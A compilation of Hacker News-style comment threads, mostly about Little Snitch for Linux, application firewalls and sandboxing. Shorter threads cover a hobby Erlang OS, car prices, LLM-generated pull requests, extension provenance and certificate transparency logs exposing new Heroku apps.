Recently I was wondering how viable it is to launch a niche, paid tool for Linux. I found that this is a very rare model, most tools are either just free, supported by sponsorship, supported by some paid cloud-based service that accompanies the tool, use an open-core model with paid add-ons.
I wonder if the decision of Little Snitch to make the Linux version free forever was also informed by this "no way to make money selling tools on Linux" wisdom or if there was another motivation. It seems that if any tool has chances of making decent money on Linux, a product like Little Snitch, which is already well established, with working payment infrastructure would be a good candidate.
Many from linux crowd are slightly paranoid and ideological.
I'm as a linux user very reluctant to install anything proprietary that has such sensitive info as my network traffic and would rather use opensnitch or any other foss fork.
The same time I don't mind to pay for open-source, I donate several thousands USD per year to FOSS projects. But I guess I'm in a minority here and if you make the whole stack open-source you're not going to make many sells really.
You call it paranoia, I call it zero tolerance for enshitification.
It's like the Nazi bar problem. You need to be vigilant to prevent the thing you rely on becoming yet another platform for Microsoft to exfil your personal data to NSA servers.
As the author of Little Snitch for Linux, I can tell you what drives us: we are a small company where people (not investors) make the decisions. It was a personal choice of mine, driven by a gut feeling. I'm curious about the outcome...
The Wikipedia page for Little Snitch indicates that it's written in Objective-C. Is that still the case? Before going with the new implementation, did you attempt (or consider) to port the current codebase (using e.g. Cocotron or GNUStep libraries)? If so, how good or bad of an experience was that?
Why is Little Snitch for Linux™ so hard to find from the company homepage[1] and the product page from the legacy app[2]?
Did the fact that you knew it was going to be made partially open source factor into your decision to develop a new, JS-and-DOM-based UI rather than having build targets for a shared, cross-platform codebase? (E.g. so that you wouldn't end up disclosing the source for the proprietary Mac version?)
Sorry, I overlooked that. I actually checked the license only to the point whether we can include it without other obligations and then downloaded what was offered as a download on either the web site or github, can't remember. I decided for the minified version because it's smaller. That's the purpose of minification, after all.
It's somewhat strange that they require the license to be reproduced in every copy, but then offer a download without it. But anyway, I'll prepend the license to the next public release.
> I decided for the minified version because it's smaller. That's the purpose of minification, after all.
Mm... the purpose of minification, when it's not (also) being used for obfuscation purposes, is tied directly to the execution model of Web apps—constraints that don't apply for desktop applications (even if they are implemented in e.g. the same programming language or using the same or a similar runtime).
App makers and browser extension developers who shoehorn all of the (frankly already very bad or at least questionable) "best practices" associated with the tooling that was created to deal with creating/maintaining/delivering SPAs and other browser-based products into applications loaded from disk are just fundamentally not thinking things through.
For a security-sensitive application like this one, where a show of nothing-up-the-sleeve is only a benefit, one should expect there to be _no_ minified blobs in use.
I'll post in our blog about the development background later. The Linux version shares no code with the Mac version. Only concepts. It's written in Rust and JavaScript (for the Web UI).
Our site is primarily aimed at Mac users, and most visitors skim rather than read carefully. If the Linux package were more prominent, Mac users would likely click it, struggle to install it, and blame us for the confusion.
And regarding your third question: No. The decision was made when I wanted to run it on our headless servers.
As a paying customer, I wasn't expecting this so thank you! Can you expand more on your gut feeling? Also, I have different security expectations on Linux vs MacOS. Would you ever consider open sourcing the daemon?
It's hard to expand on the gut feeling. I wanted to have the app myself. Adding licensing to the code, limiting functionality for a demo mode, and then wait whether Linux users would pay for it just did not feel right.
Regarding daemon open source: The future is hard to predict, even more with AI being just invented. I would love to make it open source, but if you can feed it into Claude and tell it to convert it to a Mac version, we could lose our income.
For the moment, we prefer to keep it closed because we cannot estimate the consequences of making it open source.
When OpenSnitch already exists and is free and open source, a paid tool that does essentially the same thing with a slightly different (perhaps more polished) UI would be quite a hard sell.
Both for the obvious cost reason, but also because manu of us don't like having code ok our computers we can't inspect, especially not in privileged positions like a firewall is. I.e. I don't care much if a game or the Spotify app is closed source, but neither of those run privileged, in fact I run them sandboxed (Flatpak).
I'm not a Little Snitch or Open Snitch user, I wonder if these firewalls are able to block requests done with the use of some other, allow-listed program.
Say I run a script `suspicious.py' and I deny this script from making any network requests. I also have firefox which is allowed to make any HTTPS requests. If suspicious.py does something like:
It depends. Little Snitch for Linux has a two level namespace for processes. It takes the process doing the connection and its parent process into account when evaluating rules.
Also: If an interpreter is run via `#!/bin/interpreter` in the script binary, it makes the rule for the script file path, not the interpreter. This does not work when running the script as `interpreter script`, though.
With the literal rules described it would not be blocked. A more detailed rule (in Open Snitch at least, not as familiar with the other variants) could match e.g. whether the process's parent tree contained the python binary rather than just if python is the process binding the socket.
Not necessarily (with Open Snitch at least), it just depends how complex you want to make your firewall rules and what the specific goal is (block this specific script, block scripts which try to do this activity, block connection to evil.net, block python scripts, etc).
The more granular one gets the more likely they aren't really meaning to ask how to do it in the firewall layer though. E.g. if we take it further to wanting to prevent python -c "specific logic" it's clearer what you can do in the firewall is not necessarily the same as what's practical or useful.
The allow rule for Firefox is what would suppress the prompt. You probably don't want to have a prompt for every Firefox connection though, so you'd need to come up with some kind of ruleset (or get very annoyed :D).
This gets even more involved when you consider things like loading libraries, there's also the impact of calls like OpenProcess/WriteProcessMemory/CreateRemoteThread (Windows-land versions, though I'm sure similar exists elsewhere).
The "good" Windows firewalls like Outpost and Zone Alarm used to have features to catch this, they'd detect when a process tried to invoke or open a running process which had internet access. They'd also do things like detect when a process tried to write a startup item. This went by names like "Leak Control" but it was basically providing near-complete HIDS features with local control.
The SELinux MAC policy should restrict which files and ports each process may access. In general, most modern distro have this feature, but normal users do not go through the rules training and default enable flag setup. =3
Check also https://github.com/wrr/drop which is a higher-level tool than bwrap. It allows you to make such isolated sandboxes with minimal configuration.
This looks nice but I wouldn't trust a very fresh tool to do security correctly.
As a higher-level alternative to bwrap, I sometimes use `flatpak run --filesystem=$PWD --command=bash org.freedesktop.Platform`. This is kind of an abuse of flatpaks but works just fine to make a sandbox. And unlike bwrap, it has sane defaults (no extra permissions, not even network, though it does allow xdg-desktop-portal).
Shame it's not a bit more mature, it does look like more the sort of thing I want. I use firejail a bit, but it's a bit awkward really.
To be honest - and I can't really believe I'm saying it - what I really want is something more like Android permissions. (Except more granular file permissions, which Android doesn't do at all well.) Like: start with nothing, app is requesting x access, allow it this time; oh alright fine always allow it. Central place to manage it later. Etc.
The kernel is pretty much from scratch. It provides a FreeBSD compatible syscall interface for the syscalls that BEAM calls, as well as the FreeBSD runtime loader. I do make healthy use of FreeBSD libraries to provide the OS, you can get an idea of what I pull from the file names in the Makefile [1]. Building an OS is a lot, so I tried to stick to the parts I find fun and interesting. Things like a NIC driver in Erlang [2] (with NIFs to copy to/from device memory). But process / thread creation is original, memory management is original (not necessarily good), time keeping is original, etc. I used existing code and interfaces so I didn't have to write a bootloader, memcpy, and lots of other stuff.
DragonFlyBSD would be really interesting here as well since its kernel has Light Weight Kernel Threads that use message passing. Similar in shape to Erlang/BEAM. Though I guess you've built the kernel in Erlang... so wrong abstraction.
My kernel is in C. BEAM is in userspace. Most of the drivers are in userspace too. Turns out, if you let userspace mmap whatever address it wants to, and have access to all the i/o ports, plus have a way to hook interrupts, you can write drivers in userspace.
You could run beam as init with an existing kernel, but I wanted to explore something with less kernel.
In Europe there have always been a good selection of affordable, entry-level vehicles, but recently these affordable choices have largely vanished. Toyota Corolla, the best-selling car in the world, is about 100% more expensive than pre-covid. Toyota Yaris, originally a small, city car, has gotten bigger, and more expensive. Basically, small, city car options are disappearing. Short-term, this is beneficial for car makers, because they sell more expensive options with larger margins, but it creates a large gap to fill. Chinese manufacturers make a multitude of models at very competitive prices and currently only taxes are keeping these models from dominating the markets. Long term, automakers must return to making affordable cars with smaller margins to survive.
I work on a sandboxing tool similarly based on an idea to point the user home dir to a separate location (https://github.com/wrr/drop). While I experimented with using overlayfs to isolate changes to the filesystem and it worked well as a proof-of-concept, overlayfs specification is quite restrictive regarding how it can be mounted to prevent undefined behaviors.
I wonder if and how jai managed to address these limitations of overlayfs. Basically, the same dir should not be mounted as an overlayfs upper layer by different overlayfs mounts. If you run 'jai bash' twice in different terminals, do the two instances get two different writable home dir overlays, or the same one? In the second case, is the second 'jai bash' command joining the mount namespace of the first one, or create a new one with the same shared upper dir?
'Using an upper layer path and/or a workdir path that are already used by another overlay mount is not allowed and may fail with EBUSY. Using partially overlapping paths is not allowed and may fail with EBUSY. If files are accessed from two overlayfs mounts which share or overlap the upper layer and/or workdir path, the behavior of the overlay is undefined, though it will not result in a crash or deadlock.'
If an author of a PR just generated code with an LLM, the GitHub PR becomes an incredibly inefficient interface between a repository owner and the LLM. A much better use of the owner time would be to interact with LLM directly instead of responding to LLM generated PR, waiting for updates, responding again, etc.
As a project maintainer, I don't want to interact with someone's LLM. If a person submits a PR, using LLM or not, the person is responsible for any problems with it. How they respond to review is a good indicator if they actually understand the code. And if they used a bot to submit the PR, I'd simply consider it a spam.
Yep, the indirection through the PR author is almost always inefficient and error-prone unless the author is really knowledgable about the code (many aren't).
This is also very detrimental to buyer experience. When you search for a specific new product, prices from different sellers can vary widely. Most often there is no way to tell what is the reason for the difference. Is the cheapest offer simply the best deal, or is it a refurbished product, or even a fake?
An extension from a trusted, non anonymous developer which is released as open source is a good signal that the extension can be trusted. But keep in mind that distribution channels for browser extensions, similarly to distribution channels for most other open source packages (pip, npm, rpm), do not provide any guarantee that the package you install and run is actually build verbatim from the code which is open sourced.
Actually, npm supports "provenance" and as it eliminated long lived access tokens for publishing, it encourages people to use "trusted publishing" which over time should make majority of packages be auto-provenance-vefified.
Unless the Chrome web store integrates with this, it puts the onus on users to continuously scan extension updates for hash mismatches with the public extension builds, which isn’t standardized. And even then this would be after an update is unpacked, which may not run in time to prevent initial execution. Nor does it prevent a supply chain attack on the code running in the GitHub Action for the build, especially if dependencies aren’t pinned. There’s no free lunch here.
If the RPM/deb comes from a Linux distribution then there is a good chance there is a separate maintainer and the binary package is always built from the source code by the distro.
Also if the upstream developer goes malicious there is a good chance at least one of the distro maintainers will notice and both prevent the bad source code being built for the distro & notify others.
I have investigated similar situation on Heroku. Heroku assigns a random subdomain suffix for each new app, so URLs of apps are hard to guess and look like this: test-app-28a8490db018.herokuapp.com.
I have noticed that as soon as a new Heroku app is created, without making any requests to the app that could leak the URL via a DNS lookup, the app is hit by requests from automatic vulnerability scanning tools. Heroku confirmed that this is due the new app URL being published in certificate authority logs, which are actively monitored by vulnerability scanners.
> certificate authority logs, which are actively monitored by vulnerability scanners
That sounds like a large kick-me sign taped to every new service. Reading how certificate transparency (CT) works leads me to think that there was a missed opportunity to publish hashes to the logs instead of the actual certificate data. That way a browser performing a certificate check can verify in CT, but a spammer can't monitor CT for new domains.
I think it was more of an intentional tradeoff, as one of the many goals of CT logs was to allow domain owners to discover certificates issued for their domains, or more generally for any interested party to audit the activity of a certificate authority.
What you're describing there is certificate... translucency, I guess?
Yes, "translucent database" was exactly the concept I thought of when asking the question. The concept is keep access to specific items easy but accessing the entire thing as a whole more costly.
This applies only to Heroku Fir and Cedar apps (apps that run in Heroku Private Spaces). Heroku Common Runtime apps still use shared wildcard certificate and their domains are not discoverable like this.
I wonder if the decision of Little Snitch to make the Linux version free forever was also informed by this "no way to make money selling tools on Linux" wisdom or if there was another motivation. It seems that if any tool has chances of making decent money on Linux, a product like Little Snitch, which is already well established, with working payment infrastructure would be a good candidate.
reply